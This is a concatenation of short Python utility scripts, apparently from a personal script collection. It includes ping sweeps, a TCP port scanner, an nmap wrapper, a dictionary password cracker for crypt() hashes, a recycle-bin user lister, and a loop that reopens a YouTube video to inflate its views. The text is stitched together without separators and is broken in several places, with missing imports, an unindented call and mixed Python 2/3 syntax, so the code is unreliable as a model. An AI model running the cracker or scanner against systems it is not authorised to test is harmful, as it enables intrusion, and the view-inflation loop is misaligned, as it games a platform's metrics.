        tgtName = gethostbyaddr(tgtIP)          # Get hostname from IP
        print('\n[+] Scan Results for: ' + tgtName[0])
    except Exception:                           # No reverse record: fall back to the raw IP
        print('\n[+] Scan Results for: ' + tgtIP)
    setdefaulttimeout(1)                        # 1s socket timeout keeps the scan quick
    for tgtPort in tgtPorts:                    # Scan host and ports, one worker thread each
        t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
        t.start()
def main():
    """Parse -H/-p options and kick off the port scan."""
    parser = optparse.OptionParser('usage %prog -H'+' <target host> -p <target port>')
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-p', dest='tgtPort',type='string', help='specify target port[s] seperated by a comma')
    (options, args) = parser.parse_args()
    # Fix: test the options themselves.  The old check str(None).split(',')
    # produced the *string* 'None', so "tgtPorts[0] == None" was never True,
    # and it combined the booleans with bitwise | instead of logical or.
    if options.tgtHost is None or options.tgtPort is None:
        print(parser.usage)                     # print() for Python 2/3 compatibility
        exit(0)
    tgtHost = options.tgtHost
    tgtPorts = options.tgtPort.split(',')       # -p accepts a comma-separated list of ports
    portScan(tgtHost, tgtPorts)
if __name__ == '__main__':
    main()
# Script Name : work_connect.py
# Author : Craig Richards
# Created : 11th May 2012
# Last Modified : 31st October 2012
# Version : 1.1
# Modifications : 1.1 - CR - Added some extra code, to check an argument is passed to the script first of all, then check it's a valid input
# Description : This simple script loads everything I need to connect to work etc
import subprocess # Load the Library Module
import sys # Load the Library Module
import os # Load the Library Module
import time # Load the Library Module
dropbox = os.getenv("dropbox")                  # Dropbox root, from the environment
rdpfile = ("remote\\workpc.rdp")                # Relative path of the saved RDP session
conffilename=os.path.join(dropbox, rdpfile)     # Full path to the RDP file
remote = (r"c:\windows\system32\mstsc.exe ")    # Path to the Remote Desktop client
text = '''You need to pass an argument
-c Followed by login password to connect
-d to disconnect'''                             # Usage text for missing or invalid options - 1.2
if len(sys.argv) < 2:                           # At least one option is required - 1.2
    print(text)                                 # print() so this parses on Python 3 too
    sys.exit()                                  # Exit the program - 1.2
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv:  # Help Menu if called
    print(text)
    sys.exit(0)                                 # Exit the program
else:
    if sys.argv[1].lower().startswith('-c'):    # -c <password>: connect
        if len(sys.argv) < 3:                   # Fix: -c without the password used to raise IndexError
            print(text)
            sys.exit(1)
        passwd = sys.argv[2]                    # Second argument is the login password
        subprocess.Popen((r"c:\Program Files\Checkpoint\Endpoint Connect\trac.exe connect -u username -p "+passwd))
        subprocess.Popen((r"c:\geektools\puttycm.exe"))
        time.sleep(15)                          # Give Checkpoint time to connect before opening mstsc
        subprocess.Popen([remote, conffilename])
    elif sys.argv[1].lower().startswith('-d'):  # -d: disconnect the Checkpoint session
        subprocess.Popen((r"c:\Program Files\Checkpoint\Endpoint Connect\trac.exe disconnect "))
    else:
        print('Unknown option - ' + text)       # Any other option: report and show usage - 1.2
# Script Name : testlines.py
# Author : Craig Richards
# Created : 08th December 2011
# Last Modified :
# Version : 1.0
# Modifications : beven nyamande
# Description : This very simple script opens a file and writes out whatever is set for the text variable
def write_to_file(filename, txt):
    """Write *txt* to *filename*, replacing any existing contents.

    The with-statement guarantees the file is flushed and closed.
    """
    with open(filename, 'w') as file_object:
        file_object.write(txt)                  # Fix: the return value was bound to an unused local `s`
if __name__ == '__main__':
    write_to_file('test.txt', 'I am beven')
# Script Name : ping_subnet.py
# Author : Craig Richards
# Created : 12th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : After supplying the first 3 octets it will scan the final range for available addresses
import os # Load the Library Module
import subprocess # Load the Library Module
import sys # Load the Library Module
filename = sys.argv[0]                          # Sets a variable for the script name
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv:  # Help Menu if called
    print('''
    You need to supply the first octets of the address Usage : ''' + filename + ''' 111.111.111 ''')   # print() so this parses on Python 3
    sys.exit(0)
else:
    if (len(sys.argv) < 2):                     # No argument given: show usage and quit
        sys.exit (' You need to supply the first octets of the address Usage : ' + filename + ' 111.111.111')
    subnet = sys.argv[1]                        # The three octets passed on the command line
    if os.name == "posix":                      # Linux/Unix ping flavour
        myping = "ping -c 2 "
    elif os.name in ("nt", "dos", "ce"):        # Windows ping flavour
        myping = "ping -n 2 "
    with open('ping_'+subnet+'.log', 'w') as f: # with-statement guarantees the log is flushed and closed
        for ip in range(2,255):                 # Scan host addresses .2 - .254
            ret = subprocess.call(myping + str(subnet)+"."+str(ip) , shell=True,stdout=f,stderr=subprocess.STDOUT)
            if ret == 0:                        # Exit status 0 means the host answered
                f.write (subnet+"."+str(ip) + " is alive" + "\n")
            else:
                f.write (subnet+"."+str(ip) + " did not respond" + "\n")
# Script Name : ping_servers.py
# Author : Craig Richards
# Created : 9th May 2012
# Last Modified : 14th May 2012
# Version : 1.1
# Modifications : 1.1 - 14th May 2012 - CR Changed it to use the config directory to store the server files
# Description : This script will, depending on the arguments supplied, ping the servers associated with that application group.
import os # Load the Library Module
import subprocess # Load the Library Module
import sys # Load the Library Module
filename = sys.argv[0]                          # Fix: moved before first use - the usage message below referenced it before it was assigned (NameError)
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv:  # Help Menu if called
    print('''
You need to supply the application group for the servers you want to ping, i.e.
dms
swaps
Followed by the site i.e.
155
bromley''')                                     # print() so this parses on Python 3
    sys.exit(0)
else:
    if (len(sys.argv) < 3):                     # Need both the app group and the site
        sys.exit ('\nYou need to supply the app group. Usage : ' + filename + ' followed by the application group i.e. \n \t dms or \n \t swaps \n then the site i.e. \n \t 155 or \n \t bromley')
    appgroup = sys.argv[1]                      # First argument: application group
    site = sys.argv[2]                          # Second argument: site
    if os.name == "posix":                      # Linux/Unix ping flavour
        myping = "ping -c 2 "
    elif os.name in ("nt", "dos", "ce"):        # Windows ping flavour
        myping = "ping -n 2 "
    if 'dms' in sys.argv:                       # Normalise the app group
        appgroup = 'dms'
    elif 'swaps' in sys.argv:
        appgroup = 'swaps'
    if '155' in sys.argv:                       # Normalise the site
        site = '155'
    elif 'bromley' in sys.argv:
        site = 'bromley'
    logdir = os.getenv("logs")                  # Log directory from the OS environment
    logfile = 'ping_'+appgroup+'_'+site+'.log'  # Log name built from the arguments
    logfilename=os.path.join(logdir, logfile)
    confdir = os.getenv("my_config")            # Config directory from the OS environment - 1.2
    conffile = (appgroup+'_servers_'+site+'.txt')   # Server list for this group/site - 1.2
    conffilename=os.path.join(confdir, conffile)
    with open(logfilename, "w") as f:           # with-statement guarantees the log is flushed and closed
        for server in open(conffilename):       # Ping each server in the list - 1.2
            ret = subprocess.call(myping + server, shell=True,stdout=f,stderr=subprocess.STDOUT)
            if ret == 0:                        # Exit status 0 means the host answered
                f.write (server.strip() + " is alive" + "\n")
            else:
                f.write (server.strip() + " did not respond" + "\n")
    print ("\n\tYou can see the results in the logfile : "+ logfilename)   # Show the location of the logfile
# Script Name : backup_automater_services.py
# Author : Craig Richards
# Created : 24th October 2012
# Last Modified : 13th February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Tidy up the comments and syntax
# Description : This will go through and backup all my automator services workflows
import datetime # Load the library module
import os # Load the library module
import shutil # Load the library module
# Back up every Automator service workflow listed in services.conf into a
# dated folder under the Dropbox backups directory.
date_stamp = datetime.date.today().isoformat()      # e.g. 2016-02-13, used to name the backup folder
config_path = os.path.join(os.getenv("my_config"), 'services.conf')   # services.conf inside the config dir
source_root = os.path.expanduser('~/Library/Services/')   # Where the service workflows live
backup_root = os.path.join(os.getenv("dropbox"),
                           "My_backups" + "/" +
                           "Automater_services" + date_stamp + "/")   # Dated destination directory
for entry in open(config_path):                     # One workflow name per line
    workflow = entry.strip()                        # Drop surrounding whitespace/newlines
    if workflow:                                    # Skip blank lines
        shutil.copytree(os.path.join(source_root, workflow),
                        os.path.join(backup_root, workflow))   # Copy the whole workflow directory
# Script Name : powerup_checks.py
# Author : Craig Richards
# Created : 25th June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Creates an output file by pulling all the servers for the given site from SQLITE database, then goes through the list pinging the servers to see if they are up on the network
import sys # Load the Library Module
import sqlite3 # Load the Library Module
import os # Load the Library Module
import subprocess # Load the Library Module
from time import strftime # Load just the strftime Module from Time
dropbox=os.getenv("dropbox") # Set the variable, by getting the value of the variable from the OS
config=os.getenv("my_config") # Set the variable, by getting the value of the variable from the OS
dbfile=("Databases/jarvis.db") # Set the variable to the database
master_db=os.path.join(dropbox, dbfile) # Create the variable by linking the path and the file
listfile=("startup_list.txt") # File that will hold the servers
serverfile=os.path.join(config,listfile) # Create the variable by linking the path and the file
outputfile=('server_startup_'+strftime("%Y-%m-%d-%H-%M")+'.log')
# Below is the help text
text = '''
You need to pass an argument, the options the script expects is
-site1 For the Servers relating to site1
-site2 For the Servers located in site2'''
def windows():                                  # Runs when the OS is Windows
    """Ping every server listed in serverfile and append the result to outputfile."""
    # with-statement closes both the log and the NUL sink even on error;
    # the old code leaked the log handle and opened NUL once per server.
    with open(outputfile, 'a') as f, open('NUL', 'w') as devnull:
        for server in open(serverfile,'r'):     # One hostname per line
            ret = subprocess.call("ping -n 3 %s" % server.strip(),stdout=devnull,stderr=subprocess.STDOUT)
            if ret == 0:                        # Exit status 0 means the host answered
                f.write ("%s: is alive" % server.strip().ljust(15) + "\n")
            else:
                f.write ("%s: did not respond" % server.strip().ljust(15) + "\n")
def linux():                                    # Runs when the OS is Unix/Linux
    """Ping every server listed in serverfile and append the result to outputfile.

    Fix: now writes to the shared `outputfile` - it previously built its own
    date-only log name, so the "check the log file" message in main() pointed
    at a file this function never wrote.
    """
    with open(outputfile, 'a') as f, open('/dev/null', 'w') as devnull:
        for server in open(serverfile,'r'):     # One hostname per line
            ret = subprocess.call("ping -c 3 %s" % server, shell=True,stdout=devnull,stderr=subprocess.STDOUT)
            if ret == 0:                        # Exit status 0 means the host answered
                f.write ("%s: is alive" % server.strip().ljust(15) + "\n")
            else:
                f.write ("%s: did not respond" % server.strip().ljust(15) + "\n")
def get_servers(query):                         # Function to get the servers from the database
    """Fetch the hostnames for *query* from the database into serverfile.

    Each hostname is appended to serverfile and echoed to the screen.
    """
    conn = sqlite3.connect(master_db)           # Connect to the database
    cursor = conn.cursor()                      # Create the cursor
    cursor.execute('select hostname from tp_servers where location =?',(query,))  # Parameterised SQL
    print ('\nDisplaying Servers for : ' + query + '\n')
    # Open the output file once instead of re-opening it for every row;
    # the with-statement guarantees it is closed.
    with open(serverfile, 'a') as f:
        for row in cursor:                      # Iterate the result set directly
            f.write("%s\n" % str(row[0]))       # Record the server in the file
            print(row[0])                       # Fix: was a Python 2 print statement in an otherwise py3-printing script
    conn.close()                                # Release the database connection
def main():                                     # Main Function
    """Parse the site argument, build the server list and ping each host."""
    if os.path.exists(serverfile):              # Remove any stale server list from a previous run
        os.remove(serverfile)
    if len(sys.argv) < 2:                       # No argument: show the help and stop
        print(text)                             # print() so the whole script parses on Python 3
        sys.exit()
    if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv:  # If they ask for help
        print(text)
        sys.exit(0)
    else:
        if sys.argv[1].lower().startswith('-site1'):   # If the argument is site1
            query = 'site1'
        elif sys.argv[1].lower().startswith('-site2'): # Else if the argument is site2
            query = 'site2'
        else:
            print('\n[-] Unknown option [-] ' + text)  # Unknown option: report and show usage
            sys.exit(0)
    get_servers(query)                          # Build the server list for the chosen site
    if os.name == "posix":                      # If the OS is linux...
        linux()
    elif os.name in ("nt", "dos", "ce"):        # If the OS is Windows...
        windows()
    print ('\n[+] Check the log file ' + outputfile + ' [+]\n')   # Display the name of the log
if __name__ == '__main__':
    main()                                      # Call the main function
# Script Name : password_cracker.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Old school password cracker using python
from sys import platform as _platform
# Check the current operating system to import the correct version of crypt
# Import the platform-appropriate crypt implementation.
if _platform == "linux" or _platform == "linux2":
    import crypt                                # POSIX crypt is in the standard library
elif _platform == "darwin":
    # Mac OS X ships the same POSIX crypt module
    import crypt
elif _platform == "win32":
    # Windows has no crypt; fcrypt is a drop-in pure-Python replacement
    try:
        import fcrypt                           # Try importing the fcrypt module
    except ImportError:
        print('Please install fcrypt if you are on Windows')   # print() so this parses on Python 3
def testPass(cryptPass):
    """Try to crack *cryptPass* by crypt()-hashing every candidate word
    from dictionary.txt with the hash's own two-character salt.

    Prints the matching password if found, otherwise a not-found
    message.  Fix: the dictionary file handle was never closed (it
    leaked on the early return); a ``with`` block guarantees closure
    on every exit path.  Relies on the module-level ``crypt`` import.
    """
    salt = cryptPass[0:2]  # classic DES crypt(): the salt is the first two characters
    with open('dictionary.txt', 'r') as dictFile:  # Open the dictionary file
        for word in dictFile:  # stream line by line instead of readlines()
            word = word.strip('\n')
            cryptWord = crypt.crypt(word, salt)  # hash the candidate with the same salt
            if cryptWord == cryptPass:
                # print(x) with one argument behaves identically on Python 2 and 3
                print("[+] Found Password: " + word + "\n")
                return
    print("[-] Password Not Found.\n")
    return
def main():
    """Read passwords.txt and attempt to crack every ``user:hash``
    entry by handing the hash to testPass().

    NOTE: Python 2 only (print statements).
    NOTE(review): passFile is never closed; a with-block would fix that.
    """
    passFile = open('passwords.txt') # Open the password file
    for line in passFile.readlines(): # Read through the file
        if ":" in line:
            user=line.split(':')[0]
            cryptPass = line.split(':')[1].strip(' ') # Extract the hash that follows the user name
            print "[*] Cracking Password For: "+user
            testPass(cryptPass) # Try every dictionary word against this hash
if __name__ == "__main__":
    main()# (text after this call in the dump is a file-concatenation artifact)
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications : with statement added to ensure correct file closure
# Description : Check a file exists and that we can read the file
from __future__ import print_function
import sys # Import the Modules
import os # Import the Modules
# Prints usage if not appropriate length of arguments are provided
def usage():
    """Print the command-line usage string and terminate with status 0."""
    message = '[-] Usage: python check_file.py <filename1> [filename2] ... [filenameN]'
    print(message)
    exit(0)
# Readfile Functions which open the file that is passed to the script
def readfile(filename):
    """Print the entire contents of *filename* to stdout.

    The ``with`` block guarantees the file is closed under all
    circumstances, even if reading raises.
    """
    with open(filename, 'r') as handle:
        contents = handle.read()
        print(contents)
def main():
    """Validate each filename given on the command line and print the
    contents of those that exist and are readable.

    Fix: the original called ``filenames.remove(...)`` while iterating
    over ``filenames``, which silently skips the element that follows
    every removal.  We now collect the readable files into a separate
    list instead of mutating the list being iterated.
    """
    if len(sys.argv) >= 2:  # At least one filename is required
        filenames = sys.argv[1:]
        readable = []  # files that pass both the existence and access checks
        for filename in filenames:
            if not os.path.isfile(filename):  # Must exist and be a regular file
                print('[-] ' + filename + ' does not exist.')
                continue
            if not os.access(filename, os.R_OK):  # Must be readable by this process
                print('[-] ' + filename + ' access denied')
                continue
            readable.append(filename)
    else:
        usage()  # prints usage and exits the process
    # Read the content of each surviving file
    for filename in readable:
        print('[+] Reading from : ' + filename)
        readfile(filename)
if __name__ == '__main__':
main()
# Script Name : nmap_scan.py
# Author : Craig Richards
# Created : 24th May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This scans my scripts directory and gives a count of the different types of scripts, you need nmap installed to run this
import nmap # Import the module
import optparse # Import the module
def nmapScan(tgtHost, tgtPort): # This function performs the actual scan
    """Scan one host/port with python-nmap and print the TCP port state.

    NOTE: Python 2 only (print statement); requires the third-party
    ``nmap`` module (python-nmap) imported at file level.
    """
    nmScan = nmap.PortScanner()
    nmScan.scan(tgtHost, tgtPort)
    state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state'] # e.g. 'open' / 'closed' / 'filtered'
    print "[*] " + tgtHost + " tcp/" + tgtPort + " " + state
def main(): # Main program: parse -H/-p options and scan each requested port
    """Parse the target host and comma-separated port list from the
    command line, then call nmapScan() once per port.
    """
    parser = optparse.OptionParser('usage%prog ' + '-H <host> -p <port>') # Display options/help if required
    parser.add_option('-H', dest='tgtHost', type='string', help='specify host')
    parser.add_option('-p', dest='tgtPort', type='string', help='port')
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPorts = str(options.tgtPort).split(',')
    # NOTE(review): `|` is a bitwise OR (it works on booleans), and since
    # str(None) == "None", tgtPorts[0] can never equal None — only the
    # host check is effective here.
    if (tgtHost == None) | (tgtPorts[0] == None):
        print parser.usage
        exit(0)
    for tgtPort in tgtPorts: # Scan the host once per requested port
        nmapScan(tgtHost, tgtPort)
if __name__ == '__main__':
    main()
import urllib2
try:
    # Probe a well-known site with a short timeout to test connectivity.
    urllib2.urlopen("http://google.com", timeout=2)
    print ("working connection")
except urllib2.URLError: # Raised on DNS failure / unreachable network (Python 2: urllib2)
    print ("No internet connection")
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Runs checks to check my SQLITE database
import sqlite3 as lite
import sys
import os
# Build the path to the SQLite database inside the Dropbox folder.
dropbox= os.getenv("dropbox")
dbfile=("Databases\jarvis.db") # NOTE: "\j" is not an escape sequence so the backslash survives; a raw string would be safer
master_db=os.path.join(dropbox, dbfile)
con = None
try:
    con = lite.connect(master_db)
    cur = con.cursor()
    cur.execute('SELECT SQLITE_VERSION()')
    data = cur.fetchone()
    print "SQLite version: %s" % data
except lite.Error, e: # Python 2-only except syntax; use "as e" on Python 3
    print "Error %s:" % e.args[0]
    sys.exit(1)
finally:
    if con:
        con.close() # Close the version-check connection
# List all tables at once via fetchall().
con = lite.connect(master_db) # NOTE(review): reopened here and below but never closed again
cur=con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
rows = cur.fetchall()
for row in rows:
    print row
# Same listing again, this time streaming rows one at a time with fetchone().
con = lite.connect(master_db)
cur=con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
while True:
    row = cur.fetchone()
    if row == None:
        break
    print row[0] # First (only) column: the table name
# Author : Not sure where I got this from
# Created : 28th November 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Show file information for a given file
# get file information using os.stat()
# tested with Python24 vegsaeat 25sep2006
from __future__ import print_function
import os
import sys
import stat # index constants for os.stat()
import time
# Prompt for a file name, retrying a limited number of times
# (try_count is halved each pass: 16, 8, 4, 2, 1 -> at most 5 prompts).
try_count = 16
while try_count:
    file_name = raw_input("Enter a file name: ")  # pick a file you have (Python 2 input)
    try_count >>= 1
    try:
        file_stats = os.stat(file_name)
        break  # got a valid path; stop prompting
    except OSError:
        # Fix: the original passed file_name as a second print() argument
        # instead of %-interpolating it, so the tuple-style output never
        # contained the name.
        print ("\nNameError : [%s] No such file or directory\n" % file_name)
    if try_count == 0:
        print ("Trial limit exceded \nExiting program")
        sys.exit()
# create a dictionary to hold file info
file_info = {
    'fname': file_name,
    'fsize': file_stats[stat.ST_SIZE],
    'f_lm': time.strftime("%d/%m/%Y %I:%M:%S %p",
                          time.localtime(file_stats[stat.ST_MTIME])),
    'f_la': time.strftime("%d/%m/%Y %I:%M:%S %p",
                          time.localtime(file_stats[stat.ST_ATIME])),
    'f_ct': time.strftime("%d/%m/%Y %I:%M:%S %p",
                          time.localtime(file_stats[stat.ST_CTIME]))
}
# Fix: with print_function imported, a bare `print` is a no-op expression;
# print() emits the intended blank line.
print ()
# Fix: these used "," instead of "%", printing the whole dict instead of
# interpolating the named fields.
print ("file name = %(fname)s" % file_info)
print ("file size = %(fsize)s bytes" % file_info)
print ("last modified = %(f_lm)s" % file_info)
print ("last accessed = %(f_la)s" % file_info)
print ("creation time = %(f_ct)s" % file_info)
print ()
if stat.S_ISDIR(file_stats[stat.ST_MODE]):
    print ("This a directory")
else:
    print ("This is not a directory")
print ()
print ("A closer look at the os.stat(%s) tuple:" % file_name)
print (file_stats)
print ()
print ("The above tuple has the following sequence:")
print ("""st_mode (protection bits), st_ino (inode number),
st_dev (device), st_nlink (number of hard links),
st_uid (user ID of owner), st_gid (group ID of owner),
st_size (file size, bytes), st_atime (last access time, seconds since epoch),
st_mtime (last modification time), st_ctime (time of creation, Windows)"""
)# Script Name : dir_test.py
# Author : Craig Richards
# Created : 29th November 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Tests to see if the directory testdir exists, if not it will create the directory for you
import os # Import the OS module
if not os.path.exists('testdir'): # Check to see if the directory already exists
    os.makedirs('testdir') # Create it (NOTE: not race-safe; it could appear between the check and makedirs)
import webbrowser
#how much views you want
#This only works when video has less than 300 views, it won't work when there are more than 300 views...
#due to youtube's policy.
print("Enjoy your Time\n" + time.ctime())
for count in range(30): # Open the video 30 times, pausing 5 seconds between loads
    time.sleep(5)
    webbrowser.open("https://www.youtube.com/watch?v=o6A7nf3IeeA") # Launch the URL in the default browser
# Created: 6th August 2012
'''
This will batch rename a group of files in a given directory,
once you pass the current and new extensions
'''
__author__ = 'Craig Richards'
__version__ = '1.0'
import os
import sys
def batch_rename(work_dir, old_ext, new_ext):
    '''
    Batch-rename every file in *work_dir* whose extension equals
    *old_ext* so that it carries *new_ext* instead.

    Fix: the original used ``filename.replace(old_ext, new_ext)``,
    which replaces EVERY occurrence of the extension substring in the
    name (e.g. "note.txt.txt" became "note.log.log").  We now split
    the name with os.path.splitext and rebuild it, so only the real
    trailing extension is changed.
    '''
    for filename in os.listdir(work_dir):
        # Split into (root, extension); the extension includes the dot.
        root, file_ext = os.path.splitext(filename)
        # Only touch files whose actual extension matches old_ext.
        if old_ext == file_ext:
            newfile = root + new_ext
            # Rename in place within work_dir.
            os.rename(
                os.path.join(work_dir, filename),
                os.path.join(work_dir, newfile)
            )
def main():
    '''
    Script entry point: read the working directory and the two
    extensions from the command line, then delegate to batch_rename().
    '''
    target_dir = sys.argv[1]        # directory to scan
    current_ext = sys.argv[2]       # extension to replace
    replacement_ext = sys.argv[3]   # extension to apply
    batch_rename(target_dir, current_ext, replacement_ext)

if __name__ == '__main__':
    main()
# Script Name : recyclebin.py
# Author : Craig Richards
# Created : 07th June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Scans the recyclebin and displays the files in there, originally got this script from the Violent Python book
import os # Load the Module
import optparse # Load the Module
from _winreg import * # Load the Module
def sid2user(sid): # Resolve a SID folder name to a Windows user name
    """Look up *sid* under the ProfileList registry key and return the
    user name taken from its ProfileImagePath value.

    Falls back to returning the raw SID string when the lookup fails
    (key missing, value missing, or no registry access).

    Fixes: the bare ``except:`` also swallowed SystemExit and
    KeyboardInterrupt; ``except Exception`` keeps the intended
    fall-back behaviour without hiding those.  Also renamed the local
    that shadowed the ``type`` builtin.
    """
    try:
        key = OpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
        (value, value_type) = QueryValueEx(key, 'ProfileImagePath')
        # ProfileImagePath ends with the profile folder, i.e. the user name.
        user = value.split('\\')[-1]
        return user
    except Exception:
        return sid
def returnDir():
    """Return the first recycle-bin directory that exists on this
    machine, or None when none of the known locations are present."""
    candidates = ['c:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$RECYCLE.BIN\\']
    for candidate in candidates:
        if os.path.isdir(candidate):
            return candidate
    return None
def findRecycled(recycleDir): # List the contents of the recycle bin, one SID subfolder per user
    """Walk each per-user SID folder under *recycleDir*, resolve the
    SID to a user name via sid2user(), and print the files found.

    NOTE: Python 2 only (print statements).
    """
    dirList = os.listdir(recycleDir)
    for sid in dirList: # Each entry is a subfolder named after a user SID
        files = os.listdir(recycleDir + sid)
        user = sid2user(sid)
        print '\n[*] Listing Files for User: ' + str(user)
        for file in files: # NOTE: `file` shadows the Python 2 builtin of the same name
            print '[+] Found File: ' + str(file)
def main():
    """Locate the recycle-bin directory and list its contents.

    NOTE(review): returnDir() returns None when no known recycle-bin
    path exists; findRecycled() does not handle that case.
    """
    recycleDir = returnDir()
    findRecycled(recycleDir)
if __name__ == '__main__':
    main()# (text after this call in the dump is a file-concatenation artifact)
# Author : Craig Richards
# Created : 05th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This goes through the server list and pings the machine, if it's up it will load the putty session, if its not it will notify you.
import os # Load the Library Module
import subprocess # Load the Library Module
from time import strftime # Load just the strftime Module from Time
def windows(): # Runs when the detected OS is Windows
    """Ping every server named in startup_list.txt; for each live one,
    log it and launch its PuTTY session, otherwise log the failure.

    Fixes resource leaks: the log file, the server-list file and the
    per-ping NUL handle were all opened but never closed; ``with``
    blocks now close each of them deterministically.
    """
    with open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') as f:  # Open the dated logfile
        with open('startup_list.txt','r') as servers:  # Read the list of servers
            for server in servers:
                with open('NUL', 'w') as devnull:  # Discard ping output
                    ret = subprocess.call("ping -n 3 %s" % server, shell=True,stdout=devnull,stderr=subprocess.STDOUT)
                if ret == 0:  # The server answered the ping
                    f.write ("%s: is alive, loading PuTTY session" % server.strip() + "\n")
                    subprocess.Popen(('putty -load '+server))  # Load the putty session
                else:
                    f.write ("%s : did not respond" % server.strip() + "\n")  # Record the dead server
def linux():
    """Ping every server named in startup_list.txt; log the live ones
    and open an ssh session to each, log the rest as unresponsive.

    Fixes resource leaks: the log file, the server-list file and the
    per-ping /dev/null handle were opened but never closed; ``with``
    blocks now close each of them deterministically.
    """
    with open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') as f:  # Open the dated logfile
        with open('startup_list.txt') as servers:  # Read the list of servers
            for server in servers:
                with open('/dev/null', 'w') as devnull:  # Discard ping output
                    ret = subprocess.call("ping -c 3 %s" % server, shell=True,stdout=devnull,stderr=subprocess.STDOUT)
                if ret == 0:  # The server answered the ping
                    f.write ("%s: is alive" % server.strip() + "\n")
                    subprocess.Popen(['ssh', server.strip()])  # Open an ssh session to it
                else:
                    f.write ("%s: did not respond" % server.strip() + "\n")  # Record the dead server
# End of the functions
# Start of the main program: dispatch to the routine matching the host OS
if os.name == "posix": # Unix-like OS
    linux() # Call the linux function
elif os.name in ("nt", "dos", "ce"): # Windows family
    windows() # Call the windows function
import SocketServer
PORT = 8000 # This will serve at port 8000 (the original comment wrongly said 8080)
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler # Serve files from the current directory
httpd = SocketServer.TCPServer(("", PORT), Handler) # Bind to all interfaces on PORT
print "serving at port", PORT
httpd.serve_forever()# Serve until interrupted (Python 2: SimpleHTTPServer/SocketServer modules)
# Author : Craig Richards
# Created : 19th July 2012
# Last Modified : 22 February 2016
# Version : 1.0.1
# Modifications : Modified the Printing method and added a few comments
# Description : This will scan the current directory and all subdirectories and display the size.
import os
import sys ''' Load the library module and the sys module for the argument vector'''
try:
    directory = sys.argv[1] # Set the variable directory to be the argument supplied by user.
except IndexError:
    sys.exit("Must provide an argument.")
dir_size = 0 # Running total of file sizes, in bytes
fsizedicr = {'Bytes': 1,
             'Kilobytes': float(1) / 1024,
             'Megabytes': float(1) / (1024 * 1024),
             'Gigabytes': float(1) / (1024 * 1024
                                      * 1024)}
for (path, dirs, files) in os.walk(directory): # Walk through all the directories. For each iteration, os.walk returns the folders, subfolders and files in the dir.
    for file in files: # NOTE: `file` shadows the Python 2 builtin of the same name
        filename = os.path.join(path, file)
        dir_size += os.path.getsize(filename) # Add the size of each file to get the total size.
fsizeList = [str(round(fsizedicr[key] * dir_size, 2)) + " " + key for key in fsizedicr] # One "value unit" string per unit
if dir_size == 0: print ("File Empty") # Sanity check to eliminate corner-case of empty file.
else:
    for units in sorted(fsizeList)[::-1]: # NOTE(review): sorts the strings lexicographically, not by numeric magnitude
        print ("Folder Size: " + units)
# Author : Craig Richards
# Created : 14th May 2012
# Last Modified : 14 February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Tidy up comments and syntax
# Description : This script will check to see if all of the environment variables I require are set
import os
confdir = os.getenv("my_config") # Directory holding the config file (from env var my_config)
conffile = 'env_check.conf' # Name of the config file
conffilename = os.path.join(confdir, conffile) # Full path to the config file
for env_check in open(conffilename): # One environment-variable name per line (NOTE: Python 2 prints below)
    env_check = env_check.strip() # Drop the trailing newline/whitespace
    print '[{}]'.format(env_check) # Show the variable name in square brackets
    newenv = os.getenv(env_check) # Current value of that variable, or None if unset
    if newenv is None: # If it doesn't exist
        print env_check, 'is not set'
    else: # Else if it does exist
        print 'Current Setting for {}={}\n'.format(env_check, newenv) # Show the name=value pair
# Author : Craig Richards
# Created : 27th February 2012
# Last Modified : 20th July 2012
# Version : 1.3
# Modifications : 1.1 - 28-02-2012 - CR - Changed inside github and development functions, so instead of if os.name = "posix" do this else do this etc
# : I used os.path.join, so it condensed 4 lines down to 1
# : 1.2 - 10-05-2012 - CR - Added a line to include PHP scripts.
# : 1.3 - 20-07-2012 - CR - Added the line to include Batch scripts
# Description : This scans my scripts directory and gives a count of the different types of scripts
import os # Load the library module
path = os.getenv("scripts") # Set the variable path by getting the value from the OS environment variable scripts
dropbox = os.getenv("dropbox") # Set the variable dropbox by getting the value from the OS environment variable dropbox
def clear_screen():
    """Clear the terminal window using the platform's clear command."""
    command = None
    if os.name == "posix":                # Unix/Linux/MacOS/BSD/etc
        command = 'clear'
    elif os.name in ("nt", "dos", "ce"):  # DOS/Windows
        command = 'CLS'
    if command is not None:
        os.system(command)
def count_files(path, extensions):
    """Count the files under *path* (recursively) whose names end with
    *extensions* (a single suffix string or a tuple of suffixes, as
    accepted by str.endswith)."""
    total = 0
    for base, _dirs, names in os.walk(path):
        total += sum(1 for name in names if name.endswith(extensions))
    return total
def github(): # Count the files waiting in the github directory
    """Report how many files are sitting in <dropbox>/github waiting
    to be uploaded.  Uses the module-level `dropbox` path.
    NOTE: Python 2 only (print statements).
    """
    github_dir = os.path.join(dropbox, 'github') # Joins the paths to get the github directory - 1.1
